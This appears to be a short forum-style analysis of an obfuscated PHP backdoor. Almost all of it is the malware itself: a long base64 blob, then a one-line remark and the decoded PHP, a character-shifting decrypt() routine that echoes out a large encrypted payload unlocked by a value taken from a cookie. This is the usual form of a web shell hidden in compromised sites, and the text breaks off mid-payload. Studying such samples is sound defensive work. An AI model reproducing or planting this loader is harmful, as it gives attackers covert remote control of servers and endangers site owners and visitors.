itUeFp4WXhxRlUwcWlWbUtkWXlNYW5xY2VjcG9XQWxkV1ptVk5tYllhT1UzL0RxWnZOVTJhVFZwS2htVmpmMEtoUzJhQ2swVk9ieUtwUmxLTll4OFdYbTlhZ3A5T1VvSU5uWVZoVnA4eUJtcUhSbTZ1Rm1hUFZWcGVsbXAySGF6MkgxWnhZMlp1ZDFsYVVvcG1kaHNLblVzV2ZuY2llVk5LcnBWTmlXSjJZWldxVmFHMkZwNk9EbVoyVW5xV0cycUtuMUZlY3pxYVgwcXVmcDJOQ2NMV2JrOUNpV042aXFZT2NvS1ZWbXN2R29WTE9wckhHbjFUR3E2U25wS1hMMDE4OHZYK2QwWmlpMzRDZ202TzB0c2FubDlTemV0ZW9sOGl5Y3ArYXNPS2psS1REb3JTcWw2dkVxSld2aDZmSXhxV20zbnFnMTV5bjM0bWxtS3VkNHFPY25zNnplZGVmbmRHeWY1U1pvY2ZkaHBQUXE1bmhnS1BSbjV5VXNZTGIxS2ViMExOKzE1aVl4Nit0ZmFxcjJzcWhyclNtbXNxbHFOS3lmNVNab2RUR3IzalVuSnpLcFozR3NuNmNvSjNEYXoxdXcxZWcxNWlhb0YxVFlWbXQxTlNvbE5XYXFzNlZtY0tpbXFHZ1pvaUljYWZRcXEzSHBwZlZuNU9ZY1dmSG4xVnRiRUZjMktpV3padVVwM0tzM3RXU3BjcXNuc3VmbVl0YXBLaVhvc3ZFcDF1ZFFWelNtS2ZXbDVpWWNxemUxWktseXF5ZXk1K1ppMXFlbUtpcng4aVlXNTFCUW9oV1Y0WlpWRlpZVzRtRVZsV0ZXbHVJVmxlR1dWUldXRnVKaEZaVmhWcGJpRlpYaGxsVVZsaGJpWVJXVllWYVc0aFdWNFpaVkZaWVczQnJuSmlLVzZ2WmxKdkljMjVWbVozU3hxZVhoR0N6YjFOVWcxWlZtNWFxMko2WnFkU2dyTWFWb01oZWNuV0lpS2UxZTJDRVpxL1ZZSmZTcEtXWW82eVYxWnVYejV5cmgxOVcwNTZoVlY1emNJRlRVb0tnbm8ybW5kMmJvSmxkWE03Q3BhU0xkV2lPVTVyU3FKYVVtS0NPaFp1VDFLbFl4cVpVaDZhU3A1MWhoc3FaV3RXcnF0V2lwNHRhb1pTcG9KS0RuS0RHbkxDVG81elRXRnBVY25YTXdwK2x4MkN6YjFOVWcxWlJVMVZZaXNxaG1KK3FyTWFuWEllbWtxZWRZYUZyVTFLQ1YxaUZVMVNIcXFtbmNwN1B6WmlSeVp5c3hKYWowYXFXb2FtcmpvV2prOWFmWWFBOVZJTldVVk5WV0lhRnA2cldkS2pYbUp2Q3FKYWpvWm5KeGx0VWczT1VwS09jMDFaZ2oxOVl5ZENqcTlTZ244Mm5WTDlnWUdGZmQ1VzlYVkxGcHFqZXBaM0tucVZUa1dLVmdZOXhvRmloMkZWZ2hWaGRWNm13Mm9wdVBJSlhXSVZUVklOV1ZabWRkY3pRbzVmUVgxelZsS2pMWWxPcVlGcVBuRk9ZMmFtaDJaaGNoNXlaWDFtczN0VmNiWUtkbTlHaXA4aGVWWm1kWWFGclUxS0NWMWlGVTFUWHBhYVduV0NLMFpTbXltTmN6cUdhdmwyZXA1Nmx5NGlRWG9hZ3BzdU9XOFNxbXFDYVg4T0tianlDVjFpRnNENkRWbEZUUDBKdmhhT1QxcDkxcG5XSHMzZUZlMk5hbGNxaGxzZXZadFdicElWeE96eFpvZFRIY0tYV21LeU5WNlRFcXBsY2NFSnZoYWVxMW5TZXpwK1p3cDJXcDVTYjFjK25sOUNycTQxWHBNU3FtVnh3UW0rRnA2cldkS2pYbUp2Q3FKYWpvWm5KeGx0VWczT1VwS09jMDFaZ2oxOVl5ZENqcTlTZ244Mm5WTDlnWUdGZmQ1VzlYVkxGcHFqZXBaM0tucVZUa1dLVmdZOXhvRmloMkZWZ2hWaGRWNm13Mm9wdVBHdGJuczF3bXRLbWxxRmRYTmJDcDVxT1dhK1FWVjJlVnBlcXA2SGF4bHRXeUo5a2lhV28yNnBmVjZtdzJvcHVVc2lhcE5TbW1ZdGFsNXRlYzNCcXA2SFhtcUNOVjZURXFwbGZXYUhVeDQ1Wno2dWgwcGhid0dKVm5LT2V3WWlVcHN1a25ZeVFYWjVBTzFOVldJWnJVMUtDVjUzZG5LaWVRSzQ5UDZITWlWZWwxcGlmeW5CeGhaeWFwYWlzaUlxdVBJSlhXSVZYbDhkenBLZW5sOWpHbzVmRHEyQ0hZV0tTV0YybXFwcloxYVdSeGFhdDA2ZGNoNWVUcHFxcTBvMVZZWVJnWlpkY2IyMVdVVk5WUW9tQlUxS0NuYWZYbUpYR25sbVVwNnJIMmx0VTFhdVoyYVppMDU2aFZXRmF6OCtab1pDbm9OVlZZSVdab0tpanJNdlRZYUxLcDFxT1U1WFdWbFdabTJIaGExWlNnbGRZYmxla3hLcVpjRm1ieW85WG1NaHlRb2hUVklOV09sZWVwc3llcHFiRHEyQ0pvNVhYbmxwdVAxdUdnVk5TYTF1ZXpYQ2EwcWFXb1YxYzFzS25tbzVacjVCVlhaNVdsNnFub2RyR1cxYkluMlNIVlYyZVZwZVdvYWZaeGx0V3lKOWhvRDFYZzFaUlV6NnMxZGFXbW9wYnFNYW5uSTlhbXFHYms0M09wNXZQbkYvQ1gxak1wSmVPWEpuYXlxQ1hpWlJob0QxWGcxWlJVejZ0MU0yY29NMWZYTldVcU10ZmJEMVlXSWFCVTY5c1FVR2xscHpRcFpWYldadktqMVdWMGF5bTJaaW1rYWFabzFka2xwaHFhWXR5UW01enFkR2ltcUdnWUlyRWwyQ0VtcWZhb2FqSXFGK2puYWlJaW00OGJFQjQwcDZZektoWlY1aWNsSVdobDltYm9kZGNiMjAvY1phZHBkWEZXMWJGbTJhSm9abmFtcHFsWVdpZG1HcGJuVUZCcFphYzBLV1ZXMW1ieW85WG9NZXVuTTZsWW9WbG1xR1puZDZQbzVyU1dXU1ZhbXVhWDJ3OVAwR0swWlNteW5SY3lKZGloNlNXcXBtaDJJOVZZY3Vsbk1xcll0T2VvVlZ3UW0rRm5LRElkS3ZabEtpTFdxR1VxYUNQbkQwN2hxdXcyWENhektLV2tweWQyc0NXb2RDcm5kT25wNHRhb1pTcG9JK2NQVHVHcTdEWmNLVFZtNWlTcDUzV3paU1Z4MTlhaG0rUW9xYVpvMVZud290VGxkR25zZGVjbTh1cVVZOWZaNVNMY21HK1lWaklvcVRjcUpxYW5heUd2VjFoZ3BOM28xU2QxbGhkVlZka2l0V3Jwb3R5UW01WG1zdHpsNktsbmRTSlY2TERxNkNSVmF1T1dGcHVWWjdkMDV5bXgxOWN5NXRnaDZpbHE2bG1pdFdycG90eVdNdVdvTktwbGx0Wm5zNktianhybXFEU29waUxXcUdVcWFDU2tXaG5sMkJ6aFphYzBLV1ZXMW1ieW85WG9NZXVuTTZsWUpOclptaGVjM0JxcDZIWG1xQ05WNlRFcXBsZnFLelkxYUtteTZTZGpWVmxuRlorbEs1WW1KRmphNFJnWk5pbnB0ZWxwWnlpblk2RFpHdUNoSm5lVTJhVFptcFZYbUdoYXowN3g2K2gyVzQrNEVBN1Y2S2QyZFNjbHRTWXBzbHdWb1Z4VVpta3FvNkZuRytTY2x6T2IyYVZjVldjWUdPUDNGTld4WjkxeUp1bWk2T2xrcWVaMU1WYmE1bGphWmRsWFl4eFVWZWluZG5VbkpiVW1LYkpZWEdMbzZXU3A1blV4VnRpam1oaG9uQmxqSFZWbHAxeTJkV2xwdEdzcU5XWXBvdGFsSnRlYzRiZVBWYkdwcVhHbktLRGMxR21xcHJaMWFWYWhwMnExS0JnZzZtbHBhV24yWWxYbU5TbXBaRlRWcU5ZV2w5VnE5clRuNWZRWDF6THBhUFFYMXB1UDF6T3hwU1d4NmxZb2xOV3FhaWdvRzlZaUk5WG1OU21wWk5Wa05XU24xVndRb21GbTVmRG01M1hVMktnVmxOL25xdmFqb2lnMWF5YTJKYW16SmlXYlZWYWxJV29vTldzbXRpV3BzeVlscEtob2RUTVlWUytxWlRUVlc5dFdWV2JtcG5LeHFWU2tIUlloNFdaMDZLcVlLbW5vSUdob1krcG5kV2ZyYU9kbnBTZXBKVEVvcCsrcVpUVFZXOXRXcG1ZbHB6TDAxTmduMWRhc3BpbjFwZVltR0tCeXB0VGJvUmxYTktZcDlhZmxhV1dwc3FQVjViUnBKbk9vV0tGZEkybGthYUluRDFXeXB5WnlaaW1nMlJ1VTFlRnI2NTRYN2ljcXRpY285RndVV1JqYU1MVGo2Q0Vja0tKbTVuRW1wYWxWV2FqZ1ZWMTBhV3N5cUdva0lxcW81cHlodFdZcXRabW9ObWdvTCtvamFGWGMzQ0ZtNWZEbTUzWFUyS2dWbE4ycEtiYXhxR21qNHVxeHFHbnladWpZSHFteWRDWG05Q2Vjb1ZybHN5cWphV1Jwc0xUajZDRWNrS0ptNW5FbXBhbFZXYWpnYUdlbEptcWpWZWh5S21rbEp5ZGo0OVZqdFNUcG9kdVBtMmZsMXVpbWMvTlcxYldwbVNKcHFuRm9KYVdxV1NJZzE5V3lweVp5WmltajExZW1WVmZsSVdacE5Ha1lZNVRtY2Flb0ZOWHBjZktuNUhKcHFmSlZXOXRtNTJtbXJOd2dWTlNncUNlalZlbjE1ZVltSEoxaU1lY3BOV3JXb1ZaV29PcG1xMmFwOHlKVjVyRHFhcU9jV1NNVnBlaXA1M0h4SnRhaHArWjE2VlV4S2xSVjZXWjJzbGNVc3VkWU5pbnB0T2xwRnRacU1mVm0xNkVvS2JKbUt5UnBwbWpWMkdIbm5DWXc2T3J5bHl2YlQ4NlY1Nm16SjZtcHNPcllJbWpsZGVlV200L1FXK0ZwNnJXZEo3T241bkNuWmFubEp2Vno2ZVgwS3VyalZla3hLcVpYSEJDYjJwWHB0cXJkZFdsbWNxVm81aWxwTWZFbUZxRVdIVEJjcVRMcGxGaWtXS0d4S0tpMjZtaHpKdW9nNUpiWW1OaXBaQ1BYSUthcDlXc3BzeWRtYWRWbEpDUVU0NmhkVm5PcGxhUFdGTmZXYXplMVZ4dGJFQkJpWm1jb0p5Z281cW1qb1dqazlhZlpJZXFYNFZmYkZPYnI5aktwNWVLVzU3TlgxalhycVZjY0ZqTXhKK2gxWnhnaVptY2pIRTdQRDZzMWRhV21vcGJxTWFubkk5YW1xR2JrNDNPcDV2UG5GL0NYMWpNcEplT1hKbmF5cUNYaVpSaG9EMVVnMVpSc0Q5WWhvRlRsOFdmcDRWVmxzU2FVYWFwbWMzR1UyU0Vja0tGVTFTRG02bWNxWE53M2owOGJFRmJpRlpYaGxsVVZsaGJpWVJXVllWYVc0aFdWNFpaVkZaWVc0bUVWbFdGV2x1SVZsZUdXVlJXV0Z1SmhGWlZoVnBiaUZaWGhsbFVWbGhDek5haGxkYWdwOU5UbXRxb21xZVdtdExHVzFiR1kxekdscWlnV0pXY3AxcVAzRDA3eWFPbng1U2dnMXFTcGFkemNHcFhscCtxck5lU3BzaW1uWlNZblk2RFltR0VZMXFVVldDSG1scHVWVnpLbmx1bDE1bXIyYVZjaDVwZFlHWmhvNTVWWVlSZ2Q5aW9sdGFxbzF0Wm5KS1JYMStUWUhLSmwyOXRQNXFaWFZ6S3lxVnZvcWFveXFHWXpLaFpWNWxoajl3OU8ydXVvTTZmbVl0ZVZabHllTmpHbEpiR29LcU5WNWpNcUZwY1ZuV2p4NVNlMVp4aDREMDliRCthbVYxY3pKNXdWSkJaV09HdlZJZWNibkJYWnBTRFU2N2VWNkhZa3FETXBKeGJXWjZQaWxPVjBhV3N6cUdweUhFN1BENUJ6OGRibTlXV25NNmxYSWVhWDFWa1dwU0ZtVnVMc2tKdVBEMXNuNWRiV1puSjFYQnZoSnVoMTFWVWlWeFJuS2lYM2RPY3BzT1pwTXBiV01ka1UySlhab3JIWEZ1Q1c1blhwWS9BYzFXWFkxcVZnMkZXeUhKQ2JqdzliSnlvcFo2c3g4T2ZsNHBibkpOVlk0VmtWWmxoV0lyQ2xxYUxja0p1UEQzZ201Mm1tcUhNaVZ0V3c1cXNvbkJXMDU2aFZWNVlqSWRUbTlXV3I5ZWNxTVNZblpoZFhNcVBWV0dFWlZ6TFhGU0pYRkZicUszSTFLZWtpbHVla1dCb2pITnVWV09venRGVlV0NnpXTmlvbHRhcW8xdFpucEtPYUY2V1lIV2lWV0xUbnFGVlhtR0doWlNrMUpLVm9sZVlrVmhnVldOY3pKdzlPMnUwUW02d1BteDJsSitrcTh2Rm5LU0tXNXpPcFYyZVFEcWxtcXpiMDZGU2hwaXExMjQrNEVBN21hcW15ZFdjb2RCWHJOMm5rOWFlcHBtYnBNdUpWNmJhcTJIZ1BWU0RWbEdqcDUzTndLQ1QxcHFneEpTZ3oxNVRWSkdUam85ZGNZdVRsWWFjcDRWaVZhZXRySktGb0Z1ZFFWaUZVMVRNbkZtbW5yTEwwSmxhaHFTVGxwQnlrMTlhVTV1bjJNYVVsY3BmWE5LT1pjQldrcVpWWE5HZWNWYllZTE52UEZqWmM1YXJwYVRWeFpoYWhMTmFrVmVxakhFN1BLaWcyOGVabnNkZlhOdGNiMjAvVmFldHJLUFVwNlRCcVozVm41WEdtMWxYb3BPV3ZvNVd6WlJraWFtUGs1TmRWNm13Mm9wdVBJSlhXSVd3UG9OV1VWT25uZHJXcGFDQ1c2emRwMjl0c3pzPSIsJF9DT09LSUVbJzFmYTIwNzQ0MzFiNDdjYjknXSkpOyBleGl0Ow==
It's clear that this is encoded in base64... Decoding it results in:
function decrypt($txt,$key){
$txt=base64_decode($txt); $res="";
for($i=0; $i<strlen($txt); $i++){
$c=substr($txt,$i,1);
$kc=substr($key,($i%strlen($key))-1,1);
$c=chr(ord($c)-ord($kc));
$res.=$c;
}
return $res;
} @echo(decrypt("qKOry9VbVsGHh7iHj4qcmp+aX8OKblK+W6vZlJvIc1OmmpvVz5dUnUFc05irx5+jcFdslsZVbWxBXMulo9CVpqaaqtmeqKDVnKrOlKDMsJZbl5nZxmlmwZudyKKYyF5TjImn3q6HopmYjNSqg5aDZ4Gvp8+6imfNm2q7po62f2iUiafesGZ/mIWM1JyW0KKkjXx9z7BlnZiEotmtg817qIKegte6ioDam4+7ppW6a518n6zWsJ1/mZqy1GaDzIBhlIxp3MV6mpeAotmjg82HaJavp5mwnHzcm5DVm5bQa518n6zWsJ2HmZqy1GSDzICelqJ+28Kse5mYjNRlg5aDZ4Gvp8+6inzSkWqro5amf2iUiaeZsGZ/mIWi1JyNumuclqKOzqqdptKGosxql92lY4Kegs7EoKrOmaW6nIOVoWeCiazgsJ2LmICmt6KWlWeZlq6BncKHodqEfNmtg82hZ3yihtXEoJ7cm3+eqpWmf2iZhnWjg1xbnUFcy6Wj0HNTnJin1s2UoMZlm9Rhqc5YbD1ZmtLQmqfUo3WHm6jXpmtiZK/d2GGey56g2Zed0Jufpp6n1I+ipMlZc29XncaabqaqmtnVpZHFpq3Tp1yHmJ2inK3YzV9UkVlhkmVvbZygpV1cz55jbYJboaFXncaabFNZoZGMXFKGmaTUmqnVom6mqprZ1aVahpmk1Jqp1aJdY2Gr2tOlotGqYImVoNKdpqWhZIiQVVuLckJvV5XFqaaloXWIyaem0nFnlJyX0qadlKOclMSiYNeiWqA9WMmrnZ+jmdPGcKfFrqfXl6eLqaWlqafS0KqX1F9axpWdypean1Wcx9ecl9VZYY5uPoeXlZenndnUcKfFrqfXl6eLqaWlqafS0KqX1F9a2JuZz6KTpaSn0YGbodeqnYWZldWjXVOip8/TlFLUppmHXF2eQFWtnqjJ0JeXn1laoD1Yxp+lrHKtydiipMaqYNinptelnaKsndiJVZPVn5reYJjIY52UYrLV1paahGBhoD1Y1qqSp5p1iLuNVJ1BXMiiqdGqo6xyWq2jVW1sQVzXp6zXc5OUqJ2clZKWx5qnyZhchYZ1bKyZrqKaftumn75lbdqbiX2lkpjJY3ulpq6udoaaf5yXgpCuyGOMzYGbyneF2455mmWRl9lngLaEocuJp8yOeZpnkdPFlpemkaS9e5uWg52raYbgxaOKqp5qv4msl4SbhZidqrqslMuBnLWGfsabdZZlnazZZ4DciKG0rIbPkGOJpZqt2ZyVpmehvXublY+afGyCrtSciqqeaLNkrJeEeIGFkK7IY3/Or2yzd3qwjnmaZoXfq2yJ24GbyneN3ZdjZKaQrshlf5WNqL+GfseGhH2YnarEZXvMq6XHZn7Pj4iBpIOps5mEko2Nrnp63YB5pqCSvcWfk7mvq76hdpyGhWegnd+zanvOr2yzd5iwjnmaZZLRq5aXpoiwvXubk49igJ6evNSciqqearJlqMabdY2gkK7IZYu5hWm9e5uVhYiInpC+kaOX24lvrp+sl4R1l5idqrOdhpOvbLN3fsabdYStkK7IY4uTr2yzh4HMnIemnpKs2WeA3J+byneXlo55mmiFvZqWl6aQsMd7jsabdYytkK7IZoC4r2yznYnMjoVjnpCuyGWLy4BvxoqN0pl5faGSl5qni7qJosZ2m8x/h2iXkbmSlpemm6C9e5vdg3RkmJ2qrmiKuqqwsnasxpt1gK+F1JKWfKivbLKdetOZqnyogq7UnpfbgZvKd4WWjnmaZZGWmpaXpoixvXubk4OGq4mB1JKVe86vbLOdhsabdZZpkK7IZoCTr2yzrXrGm3WNopCuyGV/uK9ss6CCxpt1lmeRvNlngNyNm8p3jZR/nWRug7nNanyqn6W/ZoLam4mXrpyqkZyKqp5qvpx9moB4o6CZratmjLmqca6frJeEq4WYnarEZ4qqnmuzdn2agHmmoJnTs6KL0JukxmZknI+eea+SurpjipSJpL5lbc6QhJqekK7IZH+or2yzd47Gm3WFoYqs2WeAto2qx3l6uo55mmWFlquWl6aasryJrJeEhZeYnaquZIqqnmq/ioa7iJ5olo6qp6uKqp5ptImsl4SFm5aQrshlgaivbLOdgsabdYCukK7IY4y6o5vKd43bjXeraYaqqqqHqZubyneB2o55mmWR0tlngLZ5m8p3hd2Ih6tphuCzgIqqnmmyh3avjnmaZpG82WeAz42PyYmf3YufdZ6F0tlnf9yJpr17m5SPh6tpheCrin+or2yznX67jnmaZoa9mpaXppCyvXub3YNifWqLl9lngLZ8r717m5OPnatphtC3aIPMgZK8eayXhHWfo5CuyGV/uJuLs3igqI55mq+FrNlngMybm8p3jd2DYn2YnarEaIqqnmi+ZWXWmoejfY7S2Wd/3ImbyneJk4Odq2mGus2Wl6aRpb17m5OPh6tphpinlpemhGzHn6yXhHh9ipCuyGZ/k69ss52Yy455mmaGl9lngLajpr17m5OPnJeYnaq7nYqqnmq+oIrGm3WEr4m6zYSKqp5psmN6xpt1lmWQrshjjKiFm8p3jsyQY4GYnaq7nojMeZvKd42TjnmaZoes2WeAqX1pvXubk4WHq2mGqsmWl6aJpL17m92DeIGmm5jFnoqqnmq/eI6YjnmaZYe7xWeKqp5qvmV+xpt1jGqQrshjf7ajm8p3hZiOeZplh6zZZ4CpjK++ZZ+UjnmaaIWX0YuKqp6ys4msl4SeiZidqrpjhJOvbLOdmMabdYBoi7zZZ4Cmn5m9e5uVhXeraYbQr5aXppBttp+sl4SriZidqrebiamJm8p3jZWPq4GIkK7IZoG3o5vKd4WTg3iXmJ2qsmiKqp5qtIiflo55mmWHu8mUiqqearR6gsabdYxqkK7IY3/Or2yzrXatiHV1mJ2qumaKqp5ov3mG3Y55mmeGl9lngLl9rL17m92Fh6tphuDNfYqqnmiyZZjGm3WWrovgq5aXppGivXublY+eiXqbl9lngMybm8p3jduOeZpmhperlpemhGi9e5uThYeraYaqs2aKqp5qs2Ssl4SbfX2QrshkgM6vbLOtirOOeZpoh7urqoqqnmm+iayXhHWbo5CuyGWAk69ss3p+mYN3q2mG0MWWl6aJo8aLnNqOeZplkdLZZ4Dco5vKd5fdjnmaaIWrs5aXpoywvXubloN3q2mF4MV9haivbLOKetKPY594kK7IZYu5fXy9e5uTg4eraYXgzZaXpohtuHmsl4R1faSQrshlf5Rsm8p3hs+OeZpnkZfZZ4C2hZC9e5vdhIeraYXgo3+Fp2uvvXublYNjn5idqq5kiqqea76JrJeEm4WYnaq2Zoqqnmi+i6TGm3WMZZCuyGOBqK9ss3eg2Y+Hq2mGusWWl6aMsbN4rKeOeZplhbzZZ4Dco4S6ZKyXhKuXmJ2qumaKqp5ov3msl4SFhY+bq5poiqqeaLKfrJeEq4mWj62zlpemkGq9e5uVg2KraYXgr4aXt6N8yGSsl4Orn3+K0ZaWl6aEr717m5WDY2SokK7IZoC4r2yzinqYjnmar4a82WeAz4mix4msl4Orn2WQrshkf7ivbLKtfsabdYxpkK7IZYGphZvKd47MjnmaZZK+u5SKqp5os2Ssl4SFiauQrshji86vbLN3mLKOeZpnktHNlpemiLK9e5uWg2OXnZCuyGR/lKubyneNlo55mmWRvK91l7dsjbyJrJeEq3WYnaqzoJe4r2yzd32YiYZ4rIuX0ZaXpohrtIqkzoxiq2mF4KeWl6aRor6frJeEnomYnaq2q5a5iLK4oXbGm3WMZZCuyGOAk42byneO0I55mmeF0tlngM+Jm8p3iZWOeZqvhZfZZ4C2n5vKd4HdjnmaZZK6o52Kqp5qtIeKmZB3l4CQrshmi7ivbLOdhqyOeZplh72alpemiaO9e5uTg2SbZpCuyGSLuK9ss4ecxpt1jGWS0tlngMyEsr17m5SDn5+YnaqznYqqnmq/e5zGm3WNn5CuyGV/zq9ss6CGxpt1jGWFrNlngMx9fL17m92DeZuDjZjVlpemmrG9e5uThYiraZCuyK1/t2h9vXubk4OJn4SarsirhrivbLN3hsabdYSthdLZZ4CpjLC9e5uWhXV5g5CuyGOAqK9ss3d6xpt1gK6N09mWl6aabLKJrJeEeIV6ibzZZ3/cgZvKd4nbjnmaZ5GX2WeA3J6wvXubk5B2hZidqrKrf859q8p3erGOeZplhqzZZ4CmfZvKd5jLjnmaZoXRu6qKqp5qsomY1o55mmiFrNlngMyFo717m5SEd6tphqqnlpemmmu5iayXhJ55mJ2qs5uLk69ss52Gxpt1iGWJvNlngNybm8p3hs6Dd6tphq2nnYyoiXq9e5uWhGFjrIzTr5aXppBou3msl4R1eZidqsRmiqqeaL95rJeEnn2WkZizlpemjGi2i5iym52raYatt5aXppCyv3msl4SFhZidqrKriqqea7NkrJeEeImmjNLZZ4DMhaO7eayXhHV5aJCuyGOMuqebyneGy49jhYqQrshjf7ivbLOtmMabdYWhmdPZnYyor2yzh4aljnmaaIaX2WeAqY1uvXubk4Odq2mG0K+eiKd9m8p3l5aKn6OIkK7IZX+Tr2yznYa4h4eraYbgxZaXpomjsnmsl4SFiaWQrshji86vbLOHht2KnIGYnaq7n3+or2yzeoqnjnmaZ5Ks2WeAzIlqvp+sl4OrfZidqrpjiqqea7JkpLqOeZqvh7zZZ4DMn5vKd4rLjnmaZYbS2Wd/3KOpvp+sl4R1l5idqrudiqqear5lfsabdY2hjb3FlpemjK+9e5uUg2F5mJ2qumiLk69ss3ecuo55mmeHvNlngKmFjbeJrJeDq3WDkK7IZou4r2yzd3nbjnmaZZLRs4WKqp6ysnhlxpt1hGWSl9lngJR9hrt4ZcabdYBlkK7IY4y4r2yzd4bGm3WFoJCuyGWBt3CbyneXloN3q2mGrauWl6aNoL17m92Dm59nkK7IZIu2gWzHeZzGm3WArpCuyGOAzq9ss6B+vI55mq+FmLOWl6aar717m5SPhpuYnaq2rIqqnmq/n6yXhHWfepCuyK1/qZubyneGz455mmiRu82Wl6aEaL17m5OQnatphuDFlpemhK+4ZKTGm3WArpCuyK2BupGZsp+sl4Srm6iPqquWl6aIar17m5WPnatphrrJlpemhLG9e5uVhXirnZCuyGSAk69ss52G2Y55mmeGrNlngKaFer17m92Fhp96mZfZZ4Dcm4jJZKyXg6t1gY/QqmiWzqaxvXubloV3q2mG06+Wl6aMbL17m92DnI2Ynaq7nImor2yyrX7EjnmaaIbTr5aXppGjvXub3YOIm5idqrpjiqqeaLJjeZiOeZplh7zZZ4CmhYKyZKyXhHiFmJ2qu5uKqp5qtHmsl4OrhYWOq6ugiqqeabSJrJeEhZuYnaqznpO3cGu9e5vdg3eraYatq5aXpo2gsp2gxpt1lmeQrshki7ivbLKtfsabdZZpmqzZZ4C2n5vKd4HciJ6nmJ2qtmd/k69ss4d9lI9hl4uQrshlgJN5m8p3id2Hh6tphtDNnoSTr2yzh47Gm3WAZZKru5aXpoRtvXubloN3q2mG0KuWl6aMa7efrJeEnomWkK7IZH+Tr2yzd5+WjnmaZYasp5aXppqvvXublZCHq2mG0KqsgbivbLOgisabdYyukK7IY4CTr2yzh47Gm3WMZ4+82WeAtpuLv5+sl4SFn5idqq6sk6mfm8p3jdyOeZpnkqq3poqqnmqynoLGm3WErYe82WeApqObyneF3Y55mmWHvNlngMyjiL17m5aEYqtpheCjf4nOr2yyrX7Gm3WIZ4Ws2WeAzIGQu4ptxpt1hGqQrshljKivbLOdm9qOeZpnhqvJlpemiLCznqyYhYeraYbgxY2Kqp5ps2WGxpt1jZ+PvMWFiqqea7SIrMabdY2gkK7IZYCqkaGyn6yXhJuFr4/S2WeAtp+HvXub3YSIfamN0tlngNx5kr17m92Dnatphqq6qou4r2yzh5eYjnmaaIa72ZaXppGjvXubk5CHq2mG4LuWl6aQsb17m5SDYqtpheDNZom4r2yzh5jOjnmaZ5GXzYuHupGivXub3YOdq2mG0MlljKZ9m8p3gZiOeZpnh6zRlpemiGy9e5uTkHmJmJ2ququUzWeuuYmsl4OrdZidqrJof5JojbyLmLKOeZpnkdLZZ4C2jZvKd4HcjnmaZZK82WeApombyneKy4edq2mGrbeWl6aRobqLnLOOeZplhqzZZ4C2o265n6yXhIWFn4XRkpaXppugvXublIScgYSQrshli7mbm8p3gduOeZplkqzZZ4CUfY6zeayXhHiJipCuyGSAuK9ss62gtZuciZidqsRmiqqeaL+JrJeEhYWfhazZZ4C2gZvKd4WTjYmbhIq7zKuHuK9ss2V6to55mmWFl9lngKmNm8p3iZOXYqtpheCjhpPOr2yzh4nbip2Fo5CuyGaAkmyNuIuYsox3q2mG0MSqhpOvbLOHhsabdYiukK7IY4C3bJvKd4WTjnmaZYe82Wd/3HmKyp+KmY55mmWSrNlngKaJm8p3jsyDd6tphq23pIe2iYa9e5vdg3afa5CuyGOMzq9ss3eGto55mmWF0ZKWl6aEr717m5SEh6tpheCjlpemiaO9e5uWj4d5mJ2qxGeGt42byneKy455mmWGl9lngKmJm8p3mMuOeZplkqzZZ3/ciZvKd4bPiHeraYats5aXpoSvuYmsl4SeeYSQrshjgLdom8p3hZOOeZpmkbvFhYqqnmmziayXhIWeZo3S2WeAz4GPvXubk4RhaJidqrucibivbLKthraOeZpnkbzRe4bOr2yzoH69m4d9po3S2WeAppuHvXublY+dn5idqq6th86Nj7dkrJeEeIV7kK7IZIG2fZvKd4ncjnmaZ5G82WeAppF/vXublIOHq2mG06eWl6aJoLeJrJeEeIWYnaq7nIqqnmi/iayXhHWNhJ3S2WeApqObyneBk4qHiY+QrshmgbivbLN6isabdY2ej7zZZ3/ceZvKd4bOjHeJaYyX2WeAtombyneFlIR3fYuO0tlngKaRh7J5fsabdYRokK7IZH/Or2yzd4rEjnmaZYa82WeAtoGbyneOzIuJn4OOvLdnh8+ne717m5ODYn2Ynaq2Y4jOr2yzd4rGm3WIrZCuyGSAuIGbyneF3IuchYyQrshjgLivbLN6irmOeZplkqqnhoS4r2yzh36pjnmaZoXRt4KKqp5os2NluImJl4OOq6t7iqqeaL94hrmaYnmmkK7IY3/NkYu9e5uThHiBmJ2qumiKqp5ovp+Gxpt1lq+QrshjjLivbLN3gsabdYxqkK7IrYGor2yzrY6wjnmaZoXgoqWFuK9ss3eGlpqdq2mGureWl6aEr717m5OQh4GJjtGrlpemjGm9e5uUg3eraYbQxZaXpoWjvXub3ZB0fKWHmLedk6lvn8hmhtyOZH2hm63Zm4uUjKeun6yXhIh5mJ2qt5uKqp5pvomsl4SIeJ6EqbNqfKqfpb9mgtqbiZeunK6RpnyqqqPKrH6rinZseJCuyGN/t6+MrqFlxX+dq2mG06uhlNCBm8p3l5aOeZpnh7zZZ4DPjZvKd42TjnmaZ4XS2WeAz4yhvYtk04VjiWmZvrJqmLpnn7Gso8qPY2ysnb6ro4yUn2iudqPZf3VrYFqPnD08hqunhXBUhZeTrJmZ3MqYpaKepcacoJGZoKBXc3BrV5jLqavZoZXQm26omJ7P06amiqqs16ejz6WomKdg2daVpdapYImZqc+in5SinZKRX6XWqajUplyHnKafoabHzphehFdajlxdjHE7c6ig28eZnsdfXMulo9CVpqaaqtmKbjyFV1zLpaPQc1lbWZ7Y0KCR16qd16aPk5NScFdaj6BXmNSmpcSop8iopI5llaCFmZvUqqzTlKHIX19VYlqU1Zyfx19hk1V0zJmgo6GZ1MVhldFlrdBVb21al6WkpaOJW1bIqafSkqnWm6OmkGjDgnBUhGB3iZmm0qOQqKid2NSOYr9xXMucptaqn5SinY+PVXLLmqfVn5XRml+WpGbbzFVtbEFbiZWg0p2mpaF1iMmnptJxZ5Sqq9pkkqGWpN/VnJXVaWiToqbKWGw9WFzbz6anxKqb15yWyJWdnKOjo4WVntGerdefYoVlU2FZpsvYl5vUZVqUclaRqaaVqKzYiaCWl19a0ZWgxJekl1dm08qWpNGrodKYXIxfXWNhqsfPl1qUZ2SXZ12MZFOWl3CwkVVtbFut06apxamUpZ6ay8Cfm9CidYmVoNKdpqWhZoiQVWCGpZ3cl53VZFNidFqU1KiU1auqjaCYmF5Tn5ekx8KmloRlpc6WptKqmqCaYI+KX2KOqZnTl1yVZl1laWGPj1WWsJ+iulVvg2VgU6GZ2dU9VYadqtSgcYWjkpyhZdTQpZfSo7GlmqPSnZ2YY5vVzlVtbEFc2KiWzZuUp1V1hoODnsOanYWUooOlo5eaqobDmKbZnJ3TU4HEqJSbVWmbgWBSr5iqyJtUlWZRlKOchtqip4KuodGfVMqbpVOWpobCl5bLq6HUoZXPVmJjWljVx1OZ0aac2FOa0qhRmaedy4JVbWxbqsqUoNGXnphVdYaDeqHRnqTKU4LIraRVcEKKzpil1ZifynBWp5uSpVValIWZm9SqrNOUo